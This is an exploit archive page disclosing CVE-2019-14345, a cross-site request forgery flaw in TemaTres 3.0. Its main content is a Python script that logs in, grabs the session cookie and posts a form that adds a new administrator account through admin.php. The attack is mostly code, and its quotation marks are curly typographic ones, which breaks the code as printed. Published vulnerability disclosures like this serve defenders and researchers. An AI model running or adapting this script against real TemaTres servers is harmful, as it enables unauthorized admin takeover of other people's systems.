exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TemaTres 3.0 Cross Site Request Forgery

TemaTres 3.0 Cross Site Request Forgery
Posted Nov 18, 2019
Authored by Pablo Santiago

TemaTres version 3.0 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 408ad091dca69f3df8a0708da1fd8237ab74307022117bec085217d142968b7d

TemaTres 3.0 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 2019–14345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10

# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.

#Exploit

import requests
import sys

session = requests.Session()

http_proxy = “http://127.0.0.1:8080"
https_proxy = “https://127.0.0.1:8080"

proxyDict = {
“http” : http_proxy,
“https” : https_proxy
}

url = ‘http://localhost/tematres/vocab/login.php'
values = {‘id_correo_electronico’: ‘pablo@tematres.com’,
‘id_password’: ‘admin’,
‘task’:’login’}

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[‘PHPSESSID’]

print (cookie)

host = sys.argv[1]
user = input(‘[+]User:’)
lastname = input(‘[+]lastname:’)
password = input(‘[+]Password:’)
password2 = input(‘[+]Confirm Password:’)
email = input(‘[+]Email:’)

if (password == password2):
#configure proxy burp

data = {
‘_nombre’:user,
‘_apellido’:lastname,
‘_correo_electronico’:email,
‘orga’:’bypassed’,
‘_clave’:password,
‘_confirmar_clave’:password2,
‘isAdmin’:1,
‘boton’:’Guardar’,
‘userTask’:’A’,
‘useactua’:’’

}
headers= {
‘Cookie’: ‘PHPSESSID=’+cookie
}
request = session.post(host+’/tematres/vocab/admin.php’, data=data,
headers=headers, proxies=proxyDict)
print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
print(‘Status Code:’+ str(request.status_code))

else:
print (‘Passwords dont match!!!’)
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close